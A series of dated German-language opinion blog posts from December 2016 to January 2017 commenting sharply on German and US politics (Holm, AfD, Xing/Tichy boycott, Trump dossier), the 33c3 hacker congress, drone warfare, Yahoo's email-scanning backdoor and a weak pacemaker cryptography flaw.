Was ich ja besonders beeindruckend finde, ist dass es in den letzten Tagen nicht nur ein sondern zwei juristische Untersuchungen dazu gab, ob die HU Andrej rausschmeißen kann oder nicht, und beide kamen zum Schluss, dass das völlig unhaltbar wäre und vor Gericht sofort zurückgenommen werden müsste. Daher schließe ich aus der Gesamtsituation, dass die HU das nicht aus eigenem Antrieb gemacht hat, sondern weil die korrupte Politik sie gezwungen hat.
Da kann man doch mal wieder echt stolz sein auf sein Land! Und WIR haben die Stirn, uns über die Griechen aufzuregen! Und die Briten!

Tue Jan 17 2017

[l] Die "Emma" ist auf Kollisionskurs mit den "Netzfeministinnen". Money Quote:
Und wenn diese Netzfeministinnen finden, dass die anderen die falsche Position haben, dann verbieten sie ihnen eben einfach den Mund, mehr noch: Sie diskreditieren sie. Am liebsten als „Rassistinnen“. Die Femen zum Beispiel. Die haben die falsche Position. Und vielleicht haben sie in den Augen der Netzfeministinnen auch zu viel Aufmerksamkeit erregt.
Das ist bei Emma natürlich völlig ausgeschlossen, dass Kritiker mit plumpen Parolen mundtot gemacht werden sollen!1!!

Fri Jan 13 2017

[l] Unser heutiger Beitrag zur Medienkompetenz ist ein Kommentar zu meiner Frage nach meinem Denkfehler. Medienkompetenz betrifft nämlich nicht nur "die Medien" im Sinne von redaktionellen Inhalten bei spiegel.de und co, sondern auch was andere Menschen online sagen. Hier ist die Einsendung:
Du hast am 11.1. im Artikel über den Spiegel Beitrag zu dem Mittel der Vergewaltigung als Waffe die Frage gestellt, wo denn dein Denkfehler sei.
Nun, vielleicht ist dir der gleiche Denkfehler unterlaufen, den ich schon ein paar Mal im Netz gesehen habe: "Frauen setzten den Vergewaltigungsvorwurf als Waffe ein". Frauen denken aber nicht in diesen Kategorien "Sex = Waffe".
Männer denken so! Männer sehen alles als Kampf, als Wettbewerb, Männer gehen vor Gericht, ziehen sich bis auf's Hemd aus um zu Gewinnen. Männer kämpfen bis auf Blut. Männer sind bereit ihren Arm zu Opfern um zu gewinnen. Männer töten kurz vor ihrem eigenen Tod noch schnell den Gegner. Klar, dies ist ein totales Klischee und es gibt haufenweise Männer, die diesem Bild nicht entsprechen. Aber in der 'Vorstellung', in der 'Rollenerwartung' an den Mann gibt es dieses Bild nun mal.
Wenn Frauen so etwas tun, dann als letztes mögliches Mittel, als ultima Ratio, wenn sie in die Ecke gedrängt werden. Da gibt es vorher eine Geschichte, die so eine Eskalation erklärt. Vielleicht gibt es jetzt, im Zuge der Emanzipation, Frauen, die meinen, sie müssten sich jetzt ähnlich Verhalten wie Männer, um im Leben voranzukommen. Aber das ist nicht die Regel und entspricht nicht dem Rollenbild einer Frau. Frauen werden (leider) immer noch dazu Erzogen still zu Dulden. Und wenn sie es dann nicht mehr aushalten, wenn sie sich endlich wehren, wird ihnen das auch wieder zum Vorwurf gemacht.
Warum darf also der Spiegel so einen Artikel mit einem Aufruf zum "Vergewaltigungsvorwurf als Waffe" veröffentlichen?
Weil die Redaktion eben erkannt hat, dass Frauen, selbst wenn sie es theoretisch wissen, es niemals in der Praxis anwenden werden!
Die Einsendung kam von jemandem mit weiblichem Vornamen.
[l] Aus der beliebten Kategorie "mit der AfD wird alles besser", heute: Habt ihr euch auch gefragt, wieso die AfD einen BND-Mitarbeiter als Kandidaten aufstellt? Haben die da sonst niemanden?
Wie sich rausstellt: Doch, hatten sie, aber gegen den wird wegen Volksverhetzung ermittelt.
Oh und dann ist da noch ein lustiges Detail zu dem BND-Mann:
Der promovierte Biologe und derzeitige Schatzmeister der Fraktion arbeitet laut AfD beim Bundesnachrichtendienst.
Das war bei den Linken immer so der Running Gag über die Nazis, dass die zu doof seien, selber einen Verein oder gar eine Partei zu führen, und daher die Verwaltung (sowas wie Schatzmeister) immer von Geheimdienst-V-Leuten gemacht werden muss, damit der Laden überhaupt vom Boden wegkommt :-)

Thu Jan 12 2017

[l] Neulich gab es bei Heise eine Meldung über Herzschrittmacher. Der Hersteller hat was gefixt.
Da wird sich vielleicht der eine oder andere ein bisschen Sorgen gemacht haben, und lieber nicht genau nachgeguckt haben, was da das Problem war.
Nun, so leicht kommt ihr mir hier nicht davon. Matthew Green schildert das Problem in einer Tweet-Serie.
Die benutzen 24-bit RSA. Nein, wirklich. 24-bit. Kein Typo. Aber falls das jemand nicht gebrochen kriegt: Es gibt auch noch einen 3-byte fixed override code.

Wed Jan 11 2017

[l] Buzzfeed (doch, wirkich!!) hat ein angebliches Kompromat-Dossier über Trump veröffentlicht.
Zwischen "28 Beweise, dass deutsche Supermärkte total die Kontrolle verloren haben" und "Du wirst nie was Schwierigeres machen, als dich zwischen diesen Kartoffeln zu entscheiden". DAS Buzzfeed.
Und der Hammer an der Sache:
A dossier, compiled by a person who has claimed to be a former British intelligence official, alleges Russia has compromising information on Trump. The allegations are unverified, and the report contains errors.
Wow. Es braucht Buzzfeed, damit die Presse mal explizit ansagt, dass ihre Materialien unverifiziert sind! Trump dementiert natürlich sofort.
Inhaltlich steht da im Grunde drin, was alle schon gedacht haben, nämlich dass die Russen Trump seit Jahren päppeln und munter Kompromat über ihn gesammelt haben, bis hin zu:
According to several knowledgeable sources, his conduct in Moscow has included perverted sexual acts which have been arranged/monitored by the FSB
Angeblich sollen die Russen ihm auch Immobilien-Deals angeboten haben, aber Trump soll keinen davon angenommen haben. Die Quelle für den ganzen Kram sind angeblich britische Geheimdienstquellen.
Ich möchte bei der Gelegenheit darauf hinweisen, dass selbst für Trump die Unschuldsvermutung gilt.
Update: Haha, das ist ja geil: JETZT ruft Trump nach den Geheimdiensten, nachdem er sie demonstrativ hat auflaufen lassen in den letzten Wochen.
Update: Mir mailen gerade diverse Leute, dass 4chan sich zu dem Dossier bekannt hat. Das ist leider offensichtlicher Bullshit, wie immer bei 4chan. Das 4chan-Geständnis spricht von einem CIA-Agenten, dem sie das gesteckt haben wollen, und der habe dann eine CIA-Akte gemacht. Es handelt sich hier nicht um eine Akte der CIA oder gar der Amerikaner, sondern das ist britisch.

Mon Jan 9 2017

[l] Unterhalb von "denen mache ich jetzt ihren Lebensunterhalt kaputt, die sollen obdachlos in der Gosse verrecken" gibt es bei den Linken anscheinend keinen politischen Diskurs mehr. Aktuell: "Wir machen jetzt Xing platt". Begründung: Roland Tichy arbeitet bei Xing News.
Und wie sich rausstellt: arbeitete, denn nach Morddrohungen hat er seinen Mitherausgeber-Posten niedergelegt.
Ihr widert mich so dermaßen an, das glaubt ihr gar nicht. Ich kann mich nicht mit einem Mob gemein machen, der Morddrohungen und Existenzvernichtung für ein Mittel des politischen Diskurses hält.
Und das ist dann die selbe Gruppe, die für sich selbst aber Safe Spaces und Schutz vor Gewalt proklamiert. Nachdem sie hier mit Pogrom-Methoden Gewalt angedroht, zur Gewalt aufgerufen und Gewalt ausüben — gegen diesen Tichy und Xing und ihre Mitarbeiter.
Ich möchte hier mal zwei Sachen deutlich machen.
Erstens empfinde ich überhaupt keine Sympathie für diesen Tichy. Seine Ideologie ist mir fremd und er kommt vom Handelsblatt, die bis vor den Bundesgerichtshof gegen mich geklagt haben. Es gibt nicht viele Menschen, für die ich noch weniger Sympathie empfinde, als für Handelsblatt-Mitarbeiter.
Zweitens: Das Gewaltmonopol liegt beim Staat. Der könnte Auschwitz leugnen und eure Morddrohungen und Boykottaufrufe wären immer noch verwerflich. Und, dass das hier mal ganz klar ist, das hat er nicht. Der hat da ein paar widerliche Positionen vertreten. Das habt ihr gefälligst auszuhalten.
Drittens legitimiert ihr diese Art von Handlung damit für die Rechten. Eines Tages werden die Nazis das mit euch tun und dann werdet ihr merken, was für abartige Unmenschen ihr seid. Und wisst ihr was? Mit jeder solchen Aktion stärkt ihr in mir das Bedürfnis, mal zu sehen, wie das mal euch angetan wird. "Der hat linke Positionen vertreten, dem dürfen Sie hier keine Plattform bieten!" Ganz super. Am besten noch mit ein paar Morddrohungen garniert.
Und die Krönung: IHR habt dann noch aus euer Position der unendlichen Privilegierung und Gewaltausübung Andersdenkender gegenüber die STIRN, bessere Safe Spaces für euch selbst einzufordern!
Das ist jetzt schon so entglitten, dass es nur noch ein-zwei Iterationen braucht, bis die Leute sich aus Sicherheitsgründen wieder alle Schusswaffen anschaffen. Und wir haben uns immer über die Amis lustig gemacht!
So langsam fange ich an, die Prepper zu verstehen. Die sehen euch und eure Morddrohungs-Mistgabel-Mobs und denken sich: Flinte + Bunker sieht jetzt wie eine gute Wahl aus.
"Eine Zensur findet nicht statt." My Ass.
Update: Oh wow. Bei dem Waffenscheint hat mich die Realität schon überholt. Krass.
Update: Die Metronauten vertreten eine Gegenposition.

Fri Dec 30 2016

[l] Soooo, heute war bei mir Socializing-Tag, und ich hab es trotzdem nur zu einem Teil der geplanten Treffen geschafft. Der Congress ist halt doch noch zu kurz. Vorträge habe ich kaum mitgekriegt. Unbedingt sehen wollte ich Machine Dreams, aber da kam ich 5 Minuten zu spät, weil mich Tilo Jung wieder zu einem Jahresend-Interview überredet hat, und das lief dann ein bisschen länger als geplant. Ich habe mich um Kopf und Kragen geredet, aber das ist ja die Idee bei sowas. Den Vortrag von Joscha habe ich jedenfalls dann im Stream geguckt, das ging auch gut.
Was dieses Jahr echt auffiel war die Häufung von Kindern auf dem Kongress. Und zwar nicht nur so 16-jährige Nerds sondern richtig kleine Kinder bis hin zu Säuglingen, aber das ganze Spektrum. Am Eingang gestern wurde ich fast von einer Schulklasse (?) umgerannt. Und die haben sich dann im Gebäude verteilt und an verschiedenen Stellen Dinge ausprobiert. Ich hatte zum ersten Mal seit einer Weile ein Gefühl von Perspektive, denn ansonsten fühlt sich die Hackerszene vergleichsweise nachwuchsarm an, finde ich immer. Dieses Gefühl von "ihr könnt uns zwar heute ärgern, aber wir werden immer mehr" gibt es so nicht. Bei diesen ganzen Hackerkindern hatte ich aber doch erstmals dieses Gefühl. Ich habe das als etwas sehr Positives empfunden.
Inhaltlich zu dem Tilo-Jung-Interview noch eine Anmerkung. Es ging u.a. um die AfD, natürlich, ob ich da als Journalist nicht in der Verantwortung bin, denen kein Forum zu bieten, weil das ja üble Populisten sind. Was ich generell zu Populismus zu sagen habe. So in die Richtung. Und meine Antworten sind weitgehend so, wie man das erwarten würde, wenn man mein Blog regelmäßig liest. Aber wie das so ist bei sowas, ein paar Punkte fallen einem immer erst danach ein. Und die will ich jetzt hier nachreichen.
Zur Frage, ob die AfD nicht vom Regen in die Traufe ist, habe ich im Interview argumentiert, dass ich als Bürger mich von CDU und SPD nach Strich und Faden verarscht fühle, und die natürlich Reaktion auf sowas ist, dass dann halt eine andere Partei erstarkt. Ich weiß nicht, ob euch das mal aufgefallen ist, aber alle Hoffnungsträgerparteien haben bisher massivst verkackt, sobald sie Regierungsverantwortung haben. Aus allen hehren humanistischen Werten von vor der Wahl wird dann ganz schnell Austerität und Neoliberalismus, auch bei den Linken.
Es gibt zur AfD aus meiner Sicht folgende Argumentationslinien und zu bedenkende Punkte:
- Macht doch nichts, wenn die AfD an die Macht kommt, denn das sind Populisten. Populisten hören auf die Bevölkerung. Das ist doch sogar demokratischer als was wir jetzt haben!
- Das sind doch bloß Protestwähler, die die AfD wählen. Nächste Wahlperiode sind die wieder weg. Das wird bei der AfD wie bei den Piraten laufen.
- Rechtspopulismus ist generell gefährlich und ein Wahlsieg von denen stiftet Leute zu ausländerfeindlichen Taten an, daher muss man die AfD bekämpfen.
- Wenn die AfD jetzt ins Parlament einzieht, dann müssen sich entweder die anderen Parteien von ihren "parteinahen Stiftungen" trennen, oder der AfD steht auch eine zu.
- Wenn die AfD in Regionalparlamente einzieht, dann kriegen die neben den Abgeordneten noch ein paar Mitarbeiterstellen bezahlt, und die machen dann Vollzeit Unterstützung für das rechte Spektrum.
Ich habe mich auf dem 33c3 mit einigen Leuten unterhalten, die mir übereinstimmend berichtet haben, dass sie von Leuten aus dem rechten Spektrum angeschrieben/angesprochen wurden, und die daher einen direkten Vergleich haben zwischen dem Gebaren auf der Linken und der Rechten, und deren Erfahrung war, dass die Rechten einen umarmen und einem Abweichungen von der Parteilinie nicht übelnehmen sondern eher eine "das wirst du schon auch noch verstehen eines Tages"-Strategie fahren. Auf der Linken hingegen werden Ausgrenzungsgründe geradezu von einer Strichliste durchgegangen, und gerade weiße Männer fühlen sich halt abgestoßen, wenn man ihnen am Eingang sagt, dass hier nur Veganer aus unterdrückten Minderheiten willkommen sind und die anderen sollen halt mal ihre Erbschuld akzeptieren und ihre Privilegen prüfen.
In meiner persönlichen Erfahrung stimmt das nur partiell überein. Ich habe auch diverse unflätige Beschimpfmails vom rechten Spektrum gekriegt, aber während es der Linken bei ihren Vorwürfen darum zu gehen scheint, dem Gegenüber (also mir) möglichst verletzende Dinge zu sagen, geht es bei den Rechten eher darum, dass die mir mal ins Gesicht sagen wollen, für wie überlegen sie sich und ihre Ideologie halten. Ansonsten kann ich aber bestätigen, dass die Rechten viel inklusiver auf ihre Neuzugänge zugehen. Das ist eine Beobachtung, die ich einigermaßen bestürzend finde, weil Inklusion und Toleranz doch eigentlich traditionell ein Konzept der Linken sind.
Update: So, sorry, musste kurz einpacken und ins Hotel, geht noch ein bisschen weiter. Also die Inklusivität bei den Rechten bezieht sich natürlich auf die Erfahrung von meinen Gesprächspartnern, und das waren weiße Deutsche ohne Migrationshintergrund. Aber das waren ja letztlich in den USA bei Trump die Wahlentscheidenden, insofern ist das glaube ich einer der springenden Punkte, wieso die Linke vergleichsweise unattraktiv auf Neulinge wirkt. Ich will das jetzt mal aus Illustrationsgründen übertreiben. Bei den Rechten kommen so Mails wie "du bist ja voll antiamerikanisch, ich betrachte dich jetzt mal als Bruder im Geiste. Dass das jüdische Finanzkapital Schuld am Holocaust ist, das merkst du bestimmt auch noch." Von der Linken kommen eher so Beschimpfungstiraden ala "Du misogynes homophobes Stück Kackscheiße, dein Putin-Apologetentum und deine unreflektiertes Amerika-Bashing werden uns alle umbringen".
Ansonsten ist es mir als Nerd ein Bedürfnis, die Argumentation der Gegenseite verstanden zu haben, und dabei nicht in die "die sind halt alle doof"-Falle zu tappen. Und in einem sehr interessanten Gespräch heute abend fiel auf, dass ich "die NSDAP, das waren eigentlich Sozialisten" immer abgetan habe. Ich habe mir gedacht, das Argument ist so offensichtlich Unsinn, das ist bestimmt ein Übertragungsfehler zwischen den Eliten und dem tumben Fußvolk auf der Straße, das die ARD dann in ihren "Befragungen" zeigt, die kaum einen kohärenten Satz rausbringen können. Aber es stellt sich raus, dass das kein Übertragungsfehler ist. Die meinen das ernst, auch Leute in oberen Schichten, über so ARD-Pegida-Demonstranten. Wenn man das als Axiom betrachtet, klären sich nämlich auch plötzlich andere Bizarritäten auf. Dann gibt es nämlich eine Kontinuität der Opferrolle von "die NSDAP hat uns kaputt gemacht" über "die Alliierten haben uns kaputt macht" hin zu "die Gutmenschen machen uns jetzt kaputt". Und daraus ergibt sich die Begründung für die Verachtung von "den Sozialisten" (denn die sind Schuld an der NSDAP), den Amerikanern für die Zeit im kalten Krieg und den Moslems für ihre "Umvolkung" jetzt (Der Begriff wird im exzellenten Maha-33c3-Vortrag erklärt). Für mich ist diese Axiomatik der Unterschied von "die glauben an 20 bizarre Dinge" und "die haben ein kohärentes Weltbild mit diesen 20 bizarren Ausprägungen".
Es gibt da eine Reihe von "deutschen Werten", die man an der Stelle annehmen muss, sowas wie traditionelles Familienbild und westliche Errungenschaften (damit ist sowas gemeint wie "wir haben hier die Aufklärung, die Moslems haben nur die Scharia"), und wir werden auf der einen Seite von verweichlichten Gender-Ideologen angegriffen, auf der anderen Seite von religiösen Fanatikern aus dem Nahen Osten, die uns alle in die Luft sprengen wollen.
Ich hoffe, ich habe das rechte Gedankengerüst grob korrekt zusammengefasst und bitte ausdrücklich um Korrektur, wenn das nicht so ist.
Die nächste Frage ist, wie man die AfD sieht:
- Eine Gruppierung von ungebildeten Idioten
- Eine Elite aus schlauen Leuten und drumherum ein Haufen ungebildeter Idioten
- Die Lage in Europa ist gerade wie ein Pulverfass und die AfD rollt wie eine Handgranate darauf zu. Ob die jetzt schlau sind oder nicht ist egal, das führt zur Explosion.
Ich warne ausdrücklich immer vor Erklärungsversuchen, die auf "die sind halt alle doof" basieren, und bin mir sicher, dass es in der AfD gebildete, schlaue Leute gibt, die da aus aus ihrer Sicht völlig rationalen Gründen mitlaufen. Wenn wir diese Gründe verstehen können, können wir möglicherweise auf sie einwirken. Das sollte unser aller Ziel sein.
Update: Was ich für eine Schulklasse hielt, war in Wahrheit diese saucoole Aktion hier.

Thu Dec 29 2016

[l] So, eine weitere Fnord-Show überstanden — trotz diverser unangekündigte Aktionen Dritter, wie eine Popcornübergabe aus einer TARDIS, beleuchtete Luftballondrohnen, eine Trump-Wahlkampfpackung Konfetti und dass uns jemand mit flüssigem Stickstoff gekühlten Tschunk brachte. In dem war glaube ich sogar ein bisschen Mate neben dem Rum. Dafür würde ich aber meine Hand nicht ins Feuer legen wollen jetzt.
Ich nehme das ja als Kompliment, dass man uns anscheinend nicht ansieht, wie gestresst wir da vorne auf der Bühne sind, und dass ihr uns als Institution seht, mit denen man sowas mal machen kann, und wir nehmen das ja auch immer sportlich, aber das verkackt uns den Flow und erhöht das Stresslevel. Und zumindest während diese Luftballons da rumgereicht wurden, hat der halbe Saal nicht den Folien folgen können. Wir haben da ein Zeitlimit, wie lange wir machen können, weil wir der Haustechnik zusagen gemacht haben, wie lange die da bleiben müssen, und das kostet extra. Das ist echt ein Arschloch-Move, wenn wir dann die letzte Show überziehen. Daher können Frank und ich dann auch nicht rumwarten, bis jemand das Konfetti weggemacht hat oder so. Lasst sowas doch bitte oder macht Varianten, die nicht stören, beispielsweise weil ihr sie in der Pause vorher macht. Auch für die Engel ist das nicht lustig, weil die dann entscheiden müssen, ob sie auf die Bühne rennen müssen und da ein Notfall ist oder so. Weiß man ja nicht auf Anhieb, wenn da Zeug von oben runterfällt. Oder koordiniert euch wenigstens mit den Saalengeln, die können dann dafür sorgen, dass es nur eine Aktion gibt und nicht fünf konkurrierende. Frank und ich sind ja durchaus dankbar für Popcorn und Blubbertschunk, so ist das nicht, aber Popcorn essen während Veranstaltung macht den Sound kaputt und Alkohol trinken macht die Jokes kaputt.
Und mein Gefühl war ja, dass wir eh schon den einen oder anderen Joke drinhatten, der nicht so gut funktioniert hat, wie wir uns das erhofft hatten.
Aber hey, das ist Meckern auf hohem Niveau. Es hat ja anscheinend doch allen Spaß gemacht, und das tolle postfaktische Video war ja auch geil (das laden die bestimmt auch bei Youtube hoch und dann verlinke ich es hier auch nochmal). Muss man wissen. :-)
Ansonsten würde ich die Videoengel drum bitten, unsere Folien und nicht uns zu priorisieren. In die Folien ist so viel Arbeit geflossen, das würde mich echt ärgern, wenn man das dann im Stream nicht zu sehen kriegt.
Update: Hier ist das postfaktische Youtube-Video der Jung&Naiv-Ultras.

Tue Dec 27 2016

[l] Mein erster Vortrag auf dem 33c3 war The Global Assassination Grid, von einem US-Militär-Whistleblower aus dem Drohnenmordprogramm. Mich hat an dem fasziniert, wie der immer noch voll unter der Militär-Indoktrinierung stand, obwohl er schon große Schritte genommen hatte, um das abzuwerfen. Der Talk war im Wesentlichen eine Liste von Gründen, wieso Drohnen als Mordwerkzeug Empathie im Soldaten verhindern, indem sie möglichst viel Abstand zwischen Mörder und Opfer tun. Dann hatte er ein paar psychologische Effekte, und argumentierte, dass die dem Knopfdrücker zur Verfügung stehenden Daten überhaupt keine Analyse ermöglichen, ob das da jetzt gerade ein gültiges Ziel ist oder nicht.
Aber so Fragen wie "wieso ermordern wir hier eigentlich überhaupt gerade Menschen in fremden Ländern, denen wir nie den Krieg erklärt haben" stellen sich ihm nicht. Am Ende kam eine Zwischenfrage in die Richtung, auf die er dann antwortete, Terrorismus sei ja kein guter Begriff für die Bewertung von so Situationen. Aber zwei Sätze vorher hatte er selbst noch von der Radikalisierung von Menschen gesprochen, was ja genau der Entstehungsmythos des Militärs für Terrorismus ist, und der Rechtfertigungsansatz für die Ermordung. Die sind radikalisiert, völlig ohne Grund, und mit denen kann man nicht mehr reden.
Für Deutschland interessant waren noch seine Ausführungen zu Ramstein. Er zitierte dafür von Wikipedia ("just mentioning this to cover my ass in relation to the Air Force") und bestätigte damit deren Ausführungen, dass Ramstein nicht nur eine Relaystation ist sondern dort Targeting gemacht wird, und Daten für Targeting-Unterstützung gesammelt und koordiniert werden. Und er sagte, er habe das ja vor dem Deutschen Bundestag so zu Protokoll gegeben vor ein paar Monaten.
Nun kann es sein, dass er da die Details durcheinanderbringt, wem er da tatsächlich im Bundestag das gesagt hat, aber wenn er tatsächlich einem offiziellen Gremium diese Mitteilung vor ein paar Monaten gemacht hat, dann hat die Bundesregierung dem Tilo Jung in der Bundespressekonferenz schlicht dreist ins Gesicht gelogen.
[l] Der Postillon landet mal wieder einen Volltreffer.
Berlin, Incirlik, Kundus, Ramstein (dpo) - Das ist ja gerade noch einmal gutgegangen. Verteidigungsministerin Ursula von der Leyen (CDU) ist nach eigenen Angaben froh, dass nach dem Terror-Anschlag auf einen Weihnachtsmarkt in Berlin niemand den Sinn und Zweck der deutschen Kriegsbeteiligungen im Nahen Osten hinterfragt.
Schön mit Link zur Liste der Kriegsbeteiligungen. Sehr schön, Postillon! Wenn das so weitergeht, dann dreht der Postillon "Fake News" als Label um, wie es "Made in Germany" und die "Daily Show with Jon Stewart" vorgemacht haben.

Sun Dec 25 2016

[l] Youtube-Tipp: LKW-Fahrer erklärt, was er so macht am Steuer.
Und das ist wichtig, dass Autofahrer sich das mal angucken, denn da werden zwei Sachen insbesondere gezeigt, die Autofahrer machen, die saugefährlich sind. Erstens: Wenn man auf die Autobahn fährt, und man ist auf der Fahrspur, die dann 200m oder so endet, dann muss man Gas geben, nicht bremsen. Guckt es euch selber an. Das ist noch nicht die große Lektion, denn das haben sie (mir zumindest) auch so beigebracht in der Fahrschule.
Die zweite Lektion ist, dass man nach dem Überholen eines LKW nicht sofort wieder nach rechts schert sondern erst mal Abstand hält. Und das habe ich auch schon falsch gemacht, weil ich nicht wusste, wieso das schlecht ist.
Das ist schlecht, weil LKWs heutzutage einen Abstandsmesser haben, und wenn die Elektronik vor dem LKW ein Hindernis misst, dann steigt sie für den Fahrer in die Eisen. Die Annahme ist, dass der Fahrer kurz eingenickt ist oder sowas. Das heißt, wenn ich einen LKW überhole und direkt rüberziehe, dass der dann ein gefährliches Bremsmanöver hinlegt, und wenn hinter dem LKW noch ein anderer LKW ist, dann kann das eine Kaskade aus gefährlichen Bremsmanövern auslösen und natürlich Auffahrunfälle.

Wed Dec 21 2016

[l] Auf den letzten Metern wollen US-Präsidenten immer noch schnell was für ihren Platz in den Geschichtsbüchern tun. Schnell noch einen Haufen Menschen begnadigen zum Beispiel, das hat Obama auch noch schnell gemacht. Allerdings nicht den Snowden und Guantanamo ist auch noch offen.
Es läuft gerade eine Petition an Obama, er möge noch schnell Cannabis bundesweit legalisieren.
Aber Obama hat was Besseres gefunden: Ein Gesetz von 1953, das ihm erlaubt, die Arktis und den Atlantik vom Ölbohren auszunehmen, und das keine Möglichkeit vorsieht, wie sein Nachfolger das wieder rückgängig machen kann. Nun kontrollieren die Republikaner das Parlament und könnten einfach ein neues Gesetz machen. Werden sie dann wohl machen müssen. Aber es ist eine schöne Geste.

Tue Dec 20 2016

[l] Nur mal so als Kontext sei darauf verwiesen, was Deutschland gemacht hat, als ein Deutscher in Afghanistan für ein Massaker verantwortlich war.
Ihr erinnert euch sicher.
Oberst Klein.
Oh, sagte ich Oberst Klein? General Klein!
So rein von der Erwartungshaltung her sollten wir jetzt also den Afghanen zum General befördern. Jedenfalls sollte unsere Polizei die Finger von dem lassen, die afghanische Polizei durfte ja auch an den Klein nicht ran. Damit die afghanische Armee den zum General befördern kann.
Also für den Fall jetzt, dass dieser afghanische polizeibekannte Kleinkriminelle tatsächlich der Fahrer des LKW war, und das ein Anschlag war. Was ich ja im Moment noch für eher unwahrscheinlich halte, denn wenn du als fiese Terrororganisation jemanden zum Durchführen eines Anschlags ins Ausland schickst, dann wird der in meinem Weltbild ja eher unauffällig bleiben und nicht polizeibekannter Kleinkrimineller werden. Das wäre echt selten dämlich, so von einem Opsec-Standpunkt aus.
Ich würde daher eher glauben, dass sie halt den nächstbesten polizeibekannten ausländischen Kleinkriminellen verhaftet haben. Und dass da ein Taschendieb auf einem Weihnachtsmarkt rumrennen würde, das klingt für mich plausibel.

Sun Dec 18 2016

[l] Ich habe hier ja schon ein paar Mal die Position vertreten, dass man Andersdenkende nicht ausgrenzen darf, sondern im Gegenteil mit ihnen reden muss.
Die meisten Extremisten haben sich ein Weltbild aufgebaut, in dem sie die Verfolgten und Ausgegrenzten sind, aber das ist nur ein Weltbild, keine faktenbasierte Erkenntnis. Das lässt sich nur solange halten, wie sie das auch so erfahren. Durch "No Platform" bestärkt man die noch in ihrer Wagenburg-Mentalität. Und man macht sich gleichzeitig alle Chancen kaputt, gefährdete Menschen noch aufzufangen, bevor sie sich solchen Gruppierungen anschließen.
Hier ging es schon mal um so eine Geschichte, damals beim Sohn des Stormfront-Gründers. Der hat gegen "die Juden" gehetzt, bis er am College auf welche traf und die ihn nicht nur nicht rausschmissen, als sie rausfanden, wer er ist, sondern ihn einluden. Und dann konnten sie ihn umstimmen.
Und hier ist noch so eine Geschichte, passend zur Weihnachtszeit. Es geht um einen schwarzen Pianisten, der in einer Kaschemme in Maryland, einem Truck Stop, Klavier gespielt hat, und im Publikum saß ein Ku-Klux-Klan-Mitglied. Die haben ins Gespräch, der Pianist ließ sich weiterreichen unter den Klansmen, und erreichte so den "Grand Dragon", den Klan-Chef von Maryland.
Er fordere die Rassisten heraus, »aber nicht auf unhöfliche oder grobe Art. Man macht das höflich und klug. Wenn man die Dinge auf diese Weise angeht, stehen die Chancen gut, dass sie zuhören und dir auch eine Plattform geben. Kelly und ich haben uns über die Jahre immer wieder hingesetzt und uns ausgetauscht. Der Mörtel, der sein Weltbild betonierte, begann zu bröckeln. Dann zu zerbrechen. Und dann fiel es ganz in sich zusammen.«
Es ist eben schwer, jemanden zu hassen, den man gut kennt.
Und mit dieser Herangehensweise hat er erreicht, dass sich der Klan in Maryland aufgelöst hat.
Ein schwarzer Pianist. Hat den KKK in Maryland aufgelöst. Völlig gewaltfrei. Durch mit den Leuten reden.
Und was mich an der Story am meisten mitnimmt: Er wird auch noch angefeindet für seine Methoden. Von anderen Schwarzen, die ihn als Verräter beschimpfen. Hier ist seine Antwort:
An dieser Stelle zieht Davis gerne seine zwei Dutzend Klan-Roben aus dem Schrank und sagt: »Schau, das habe ich gemacht, um dem Rassismus einen Denkzettel zu verpassen. Ich habe die Roben und Hauben von mehr als zwei Dutzend Menschen in meinem Schrank, die ihre Ansichten geändert haben, weil ich mich mit ihnen an einen Tisch gesetzt habe. Und, was machen Sie? Wie viele Roben haben Sie gesammelt?« Das lässt die meisten Kritiker verstummen.
Wer gut Englisch kann, kann sich hier den Original-Podcast anhören, wo der Pianist seine Geschichte erzählt.

Thu Dec 15 2016

[l] Wie sieht eigentlich so eine FBI/NSA-Hintertür in der Praxis aus? Also sagen wir mal so eine, wie sie bei Yahoo installiert haben?
Da gibt es gerade ein paar Details zu, und die sind durchaus spannend.
Die NSA suchte ganz bestimmte Mails, und Yahoo hatte eine Infrastruktur zum automatisierten Finden von Kinderpornos. Da hätte man sich also einklinken können, hat man aber nicht getan. Stattdessen:
The court-ordered search Yahoo conducted, on the other hand, was done by a module attached to the Linux kernel - in other words, it was deeply buried near the core of the email server operating system, far below where mail sorting was handled, according to three former Yahoo employees.
Krass. Stellt euch mal vor, ihr findet da ein unerklärtes Kernelmodul auf eurem Mailserver. Was tut ihr da? Mal ne Untersuchung starten, nicht wahr? Hat Yahoo auch gemacht.
In the case of Yahoo, company security staff discovered a software program that was scanning email but ended an investigation when they found it had been approved by Chief Executive Officer Marissa Mayer, the sources said.
Und das muss man diesen Leuten aus dem Security-Team hoch anrechnen, dass sie dann nicht nur gekündigt haben, sondern diese Details jetzt ausplaudern. Das ist nicht risikofrei für sie.

Sun Dec 11 2016

[l] Bei dieser ganzen Stasi-Vorwurfs-Nummer möchte ich mal noch auf ein Detail hinweisen. Die Leute, die jetzt "Stasi!!1!" brüllen, das sind CDUler. Die CDU hat in Berlin eine sehr düstere Geschichte von Immobilien-Geschäften, die viele heute rückblickend als Betrug betrachten. Das Land Berlin hat Gelder vom Bund gekriegt, mit denen die Infrastruktur aufgebaut, die zerbombten Häuser repariert werden sollten, und hat damit eine zum Gutteil aus CDUlern bestehende organisierte Bande an Geschäftsmachern erzeugt, die dann auf der einen Seite die Subventionen des Bundes und auf der anderen Seite Investments von reichen "Zahnwälten" (so hat ein Insider mir gegenüber mal die Zielgruppe bezeichnet) aus dem Westen abgezockt und sich damit ein schönes Leben gemacht hat.
Andrej Holm ist jetzt jemand, der gegen Gentrifizierung vorgehen will und sogar Hausbesetzungen befürwortet hat. Das ist für alle Bürger gut, die die inhaltlich nicht zu rechtfertigenden Mietsteigerungen der letzten Jahre zurückrollen oder zumindest aufhalten wollen. Es ist für alle eine gute Nachricht, außer für die fiesen Spekulanten, die mit Mietpreis-Abzocke und Immobiliendeals jahrelang andere Menschen abgezockt haben.
Will sagen: Es geht hier nicht um die Stasi. Es geht darum, dass hier einige CDU-nahe Gruppierungen zum ersten Mal in ihrem Leben Angst um ihre Pfründe haben müssen.
Gut so, sage ich. Gut so.
Update: Klaus Landowsky sitzt übrigens immer noch nicht im Knast.
[l] Gegen Andrej Holm stehen jetzt Stasi-Vorwürfe im Raum.
Ich bin in West-Berlin aufgewachsen und habe daher zu dem ganzen Kontext keinen direkten Zugang. Daher will ich hier mal, wie es in diesem Blog üblich ist, die Gegenthese vertreten, und dann könnt ihr euch selber eine Meinung bilden.
